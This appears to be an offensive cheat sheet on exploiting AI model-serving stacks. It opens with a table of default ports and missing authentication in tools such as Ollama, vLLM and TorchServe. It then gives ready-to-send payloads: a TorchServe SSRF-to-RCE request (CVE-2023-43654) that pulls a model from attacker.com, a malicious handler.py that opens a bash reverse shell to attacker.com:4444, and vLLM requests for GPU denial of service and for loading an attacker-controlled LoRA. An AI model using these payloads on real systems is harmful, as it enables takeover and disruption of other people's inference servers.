Model Serving Exploits

Common Serving Stacks & Their Vulns

Stack Default Port Auth Default Known Issues
Ollama 11434 None Open API, RCE via model pull
vLLM 8000 None OpenAI-compatible, unauthenticated by default
TorchServe 8080/8081 None Management API exposed, model file RCE
Triton 8000/8001/8002 None gRPC + HTTP, model repo traversal
text-gen-webui 7860 Optional API mode exposes model, file system access
LocalAI 8080 None OpenAI-compatible wrapper, full API exposure

TorchServe Exploitation (CVE-2023-43654)

# TorchServe Management API (port 8081) β€” SSRF leading to RCE
# CVE-2023-43654 β€” ShellTorchServe / ShellTorch

# Step 1: SSRF via model URL parameter
POST http://target:8081/models
Content-Type: application/json

{
  "url": "http://attacker.com/malicious.mar",  # ← SSRF point
  "model_name": "pwned",
  "initial_workers": 1
}

# Step 2: The malicious .mar file contains arbitrary Python
# executed by TorchServe during model loading

# Step 3: Python code in the MAR handler runs on TorchServe server:
# handler.py (malicious)
import os
os.system("bash -i >& /dev/tcp/attacker.com/4444 0>&1")  # reverse shell

vLLM Configuration Attacks

# vLLM exposes OpenAI-compatible API
# Default: no authentication

# List available models
GET http://target:8000/v1/models

# Query with custom sampling params (resource exhaustion)
POST http://target:8000/v1/completions
{
  "model": "llama-3-70b",
  "prompt": "Write a very long story",
  "max_tokens": 32000,         # max tokens β†’ GPU resource exhaustion
  "n": 100                     # 100 parallel completions β†’ DoS
}

# LoRA model switching (if enabled)
POST http://target:8000/v1/completions
{
  "model": "llama-3-70b",
  "prompt": "...",
  "lora_name": "attacker-controlled-lora"  # ← load attacker's LoRA
}